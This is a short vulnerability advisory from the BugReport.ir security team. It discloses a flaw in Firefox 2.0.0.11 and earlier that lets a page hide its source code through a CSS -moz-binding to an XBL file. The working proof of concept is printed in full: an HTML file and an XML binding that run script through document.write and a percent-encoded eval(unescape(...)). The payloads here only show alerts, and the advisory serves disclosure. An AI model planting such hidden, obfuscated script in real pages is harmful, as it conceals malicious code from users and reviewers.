########################## WwW.BugReport.ir ######################## # # AmnPardaz Security Research Team # # Bug Title: Mozilla Firefox 2.0.0.11 Hide The Source Code # Vendor URL: www.mozilla.org # Version: <= 2.0.0.11 # Soloution: N/A # ######################### WwW.AmnPardaz.com ######################## #################### - Description: #################### To do this work we need 2 files (Html,XML). Their codes was written below. Save below codes in a HTML file. -------------------------------------------------------------------- -------------------------------------------------------------------- <html> <head> <style>BODY{-moz-binding:url("moz.xml#xss")}</style> </head> <body> 1- Do you see any Source Code by viewing the page source? No! <script> alert('Soroush Dalili from BugReport.IR has something new for you! - Maybe there are some malicious codes instead of my name!') </script> </body> </html> -------------------------------------------------------------------- -------------------------------------------------------------------- Then save below codes in "moz.xml" file. -------------------------------------------------------------------- -------------------------------------------------------------------- <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl"> <binding id="xss"> <implementation> <constructor><![CDATA[ document.write('2 - Do you see any Source Code by viewing the page source? No! Your browser "Mozilla Firefox 2.0.0.11" is looking for something!') eval(unescape('%61%6c%65%72%74%28%27%54%68%69%73%20%69%73%20%6e%65%77%20%70%61%67%65%2e%20%77%68%65%72%65%20%69%73%20%70%61%67%65%20%31%3f%20%77%68%65%72%65%20%61%72%65%20%74%68%65%20%73%6f%75%72%63%65%20%63%6f%64%65%20%6f%66%20%70%61%67%65%20%31%20%61%6e%64%20%70%61%67%65%20%32%3f%27%29')); ]]></constructor> </implementation> </binding> </bindings> -------------------------------------------------------------------- -------------------------------------------------------------------- Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.11 it will work! #################### - Credit : #################### AmnPardaz Security Research Team Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com